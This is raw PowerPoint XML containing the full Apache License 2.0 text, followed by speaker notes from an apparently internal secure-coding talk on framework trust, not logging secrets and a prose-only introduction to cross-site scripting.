              <a:t>      other entities that control, are controlled by, or are under common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      control with that entity. For the purposes of this definition,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      "control" means (i) the power, direct or indirect, to cause the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      direction or management of such entity, whether by contract or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      otherwise, or (ii) ownership of fifty percent (50%) or more of the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      outstanding shares, or (iii) beneficial ownership of such entity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      "You" (or "Your") shall mean an individual or Legal Entity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      exercising permissions granted by this License.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      "Source" form shall mean the preferred form for making modifications,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      including but not limited to software source code, documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      source, and configuration files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      "Object" form shall mean any form resulting from mechanical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      transformation or translation of a Source form, including but</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      not limited to compiled object code, generated documentation,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      and conversions to other media types.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      "Work" shall mean the work of authorship, whether in Source or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      Object form, made available under the License, as indicated by a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      copyright notice that is included in or attached to the work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      (an example is provided in the Appendix below).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      "Derivative Works" shall mean any work, whether in Source or Object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      form, that is based on (or derived from) the Work and for which the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      editorial revisions, annotations, elaborations, or other modifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      represent, as a whole, an original work of authorship. For the purposes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      of this License, Derivative Works shall not include works that remain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      separable from, or merely link (or bind by name) to the interfaces of,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      the Work and Derivative Works thereof.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      "Contribution" shall mean any work of authorship, including</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      the original version of the Work and any modifications or additions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      to that Work or Derivative Works thereof, that is intentionally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      submitted to Licensor for inclusion in the Work by the copyright owner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      or by an individual or Legal Entity authorized to submit on behalf of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      the copyright owner. For the purposes of this definition, "submitted"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      means any form of electronic, verbal, or written communication sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      to the Licensor or its representatives, including but not limited to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      communication on electronic mailing lists, source code control systems,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      and issue tracking systems that are managed by, or on behalf of, the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      Licensor for the purpose of discussing and improving the Work, but</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      excluding communication that is conspicuously marked or otherwise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      designated in writing by the copyright owner as "Not a Contribution."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      "Contributor" shall mean Licensor and any individual or Legal Entity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      on behalf of whom a Contribution has been received by Licensor and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      subsequently incorporated within the Work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   2. Grant of Copyright License. Subject to the terms and conditions of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      this License, each Contributor hereby grants to You a perpetual,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      worldwide, non-exclusive, no-charge, royalty-free, irrevocable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      copyright license to reproduce, prepare Derivative Works of,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      publicly display, publicly perform, sublicense, and distribute the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      Work and such Derivative Works in Source or Object form.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   3. Grant of Patent License. Subject to the terms and conditions of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      this License, each Contributor hereby grants to You a perpetual,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      worldwide, non-exclusive, no-charge, royalty-free, irrevocable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      (except as stated in this section) patent license to make, have made,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      use, offer to sell, sell, import, and otherwise transfer the Work,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      where such license applies only to those patent claims licensable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      by such Contributor that are necessarily infringed by their</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      Contribution(s) alone or by combination of their Contribution(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      with the Work to which such Contribution(s) was submitted. If You</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      institute patent litigation against any entity (including a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      cross-claim or counterclaim in a lawsuit) alleging that the Work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      or a Contribution incorporated within the Work constitutes direct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      or contributory patent infringement, then any patent licenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      granted to You under this License for that Work shall terminate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      as of the date such litigation is filed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   4. Redistribution. You may reproduce and distribute copies of the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      Work or Derivative Works thereof in any medium, with or without</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      modifications, and in Source or Object form, provided that You</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      meet the following conditions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      (a) You must give any other recipients of the Work or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          Derivative Works a copy of this License; and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      (b) You must cause any modified files to carry prominent notices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          stating that You changed the files; and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      (c) You must retain, in the Source form of any Derivative Works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          that You distribute, all copyright, patent, trademark, and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          attribution notices from the Source form of the Work,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          excluding those notices that do not pertain to any part of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          the Derivative Works; and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      (d) If the Work includes a "NOTICE" text file as part of its</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          distribution, then any Derivative Works that You distribute must</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          include a readable copy of the attribution notices contained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          within such NOTICE file, excluding those notices that do not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          pertain to any part of the Derivative Works, in at least one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          of the following places: within a NOTICE text file distributed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          as part of the Derivative Works; within the Source form or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          documentation, if provided along with the Derivative Works; or,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          within a display generated by the Derivative Works, if and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          wherever such third-party notices normally appear. The contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          of the NOTICE file are for informational purposes only and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          do not modify the License. You may add Your own attribution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          notices within Derivative Works that You distribute, alongside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          or as an addendum to the NOTICE text from the Work, provided</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          that such additional attribution notices cannot be construed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          as modifying the License.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      You may add Your own copyright statement to Your modifications and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      may provide additional or different license terms and conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      for use, reproduction, or distribution of Your modifications, or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      for any such Derivative Works as a whole, provided Your use,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      reproduction, and distribution of the Work otherwise complies with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      the conditions stated in this License.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   5. Submission of Contributions. Unless You explicitly state otherwise,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      any Contribution intentionally submitted for inclusion in the Work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      by You to the Licensor shall be under the terms and conditions of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      this License, without any additional terms or conditions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      Notwithstanding the above, nothing herein shall supersede or modify</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      the terms of any separate license agreement you may have executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      with Licensor regarding such Contributions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   6. Trademarks. This License does not grant permission to use the trade</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      names, trademarks, service marks, or product names of the Licensor,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      except as required for reasonable and customary use in describing the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      origin of the Work and reproducing the content of the NOTICE file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   7. Disclaimer of Warranty. Unless required by applicable law or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      agreed to in writing, Licensor provides the Work (and each</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      Contributor provides its Contributions) on an "AS IS" BASIS,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      implied, including, without limitation, any warranties or conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      PARTICULAR PURPOSE. You are solely responsible for determining the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      appropriateness of using or redistributing the Work and assume any</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      risks associated with Your exercise of permissions under this License.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   8. Limitation of Liability. In no event and under no legal theory,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      whether in tort (including negligence), contract, or otherwise,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      unless required by applicable law (such as deliberate and grossly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      negligent acts) or agreed to in writing, shall any Contributor be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      liable to You for damages, including any direct, indirect, special,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      incidental, or consequential damages of any character arising as a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      result of this License or out of the use or inability to use the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      Work (including but not limited to damages for loss of goodwill,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      work stoppage, computer failure or malfunction, or any and all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      other commercial damages or losses), even if such Contributor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      has been advised of the possibility of such damages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   9. Accepting Warranty or Additional Liability. While redistributing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      the Work or Derivative Works thereof, You may choose to offer,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      and charge a fee for, acceptance of support, warranty, indemnity,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      or other liability obligations and/or rights consistent with this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      License. However, in accepting such obligations, You may act only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      on Your own behalf and on Your sole responsibility, not on behalf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      of any other Contributor, and only if You agree to indemnify,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      defend, and hold each Contributor harmless for any liability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      incurred by, or claims asserted against, such Contributor by reason</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      of your accepting any such warranty or additional liability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   END OF TERMS AND CONDITIONS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   APPENDIX: How to apply the Apache License to your work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      To apply the Apache License to your work, attach the following</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      boilerplate notice, with the fields enclosed by brackets "[]"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      replaced with your own identifying information. (Don't include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      the brackets!)  The text should be enclosed in the appropriate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      comment syntax for the file format. We also recommend that a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      file or class name and description of purpose be included on the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      same "printed page" as the copyright notice for easier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>      identification within third-party archives.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   Copyright [yyyy] [name of copyright owner]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   Licensed under the Apache License, Version 2.0 (the "License");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   you may not use this file except in compliance with the License.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   You may obtain a copy of the License at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>       http://www.apache.org/licenses/LICENSE-2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   Unless required by applicable law or agreed to in writing, software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   distributed under the License is distributed on an "AS IS" BASIS,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   See the License for the specific language governing permissions and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>   limitations under the License.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r>
              <a:t>Basically, you shouldn't blindly trust frameworks. It’s important to understand the underlying principles, so you can tell when the framework isn’t doing what it should, and so you can quickly fix things when it turns out they’re not.</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5" name="Shape 1405"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1406" name="Shape 1406"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Be mindful of what you're logging, and if it's a secret, don't log it. If you need to do any sanitizing, make sure it happens </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:t> the log is written to disk or uploaded to our centralized logging tools.</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5" name="Shape 1415"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1416" name="Shape 1416"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If you're interested in learning more about secret management, our very own Max Timchenko wrote up a big overview of various secret managements tools. It's well worth a look.</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4" name="Shape 1424"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1425" name="Shape 1425"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Our next topic is "Cross-Site Scripting", which you'll usually see abbreviated as XSS.</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4" name="Shape 1434"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1435" name="Shape 1435"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So what is it? Cross-site scripting is all about injecting little bits of code onto web pages that will be viewed by other people. The injected code then gets executed by them without them realizing. It allows an attacker to steal pretty much anything if executed properly.</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7" name="Shape 1447"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1448" name="Shape 1448"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let's look at a quick example. Say I've got a website, where I'm storing some user-defined data. In this case, just a comment.</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1" name="Shape 1461"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1462" name="Shape 1462"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A malicious user enters a comment that contains some JavaScript, which will popup a message saying "hello", and submits that comment to the site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:p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7" name="Shape 1477"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
